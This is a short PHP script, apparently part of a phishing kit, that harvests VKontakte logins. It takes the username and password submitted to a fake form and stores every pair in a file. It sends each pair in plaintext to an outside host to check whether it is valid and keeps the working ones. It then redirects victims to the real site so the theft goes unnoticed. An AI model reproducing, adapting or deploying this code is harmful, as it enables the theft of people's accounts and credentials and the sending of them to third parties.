Файл: log.php
Строк: 26
<?
#######################
## © By bambi_no4462 ##
#######################
@include_once('files/config.php');
$login = $_POST['login'];
$pass = $_POST['password'];
$dannii = "$login:$pass
";
file_put_contents("$_all_accounts",$dannii,FILE_APPEND);
$_URL = "http://its-checker.tk/?vk=".$login.":".$pass."";
$result = @file_get_contents("$_URL");
if(strpos($result, 'TRUE')){
file_put_contents("$_validate_accounts",$dannii,FILE_APPEND);
@header("Location: http://m.vk.com/"); exit; } //Если пароль правильный, то перенаправит на Вконтакте
@header("Location: /index.php"); exit; //Если не правильный, то обратно к Вам на сайте! =)
?>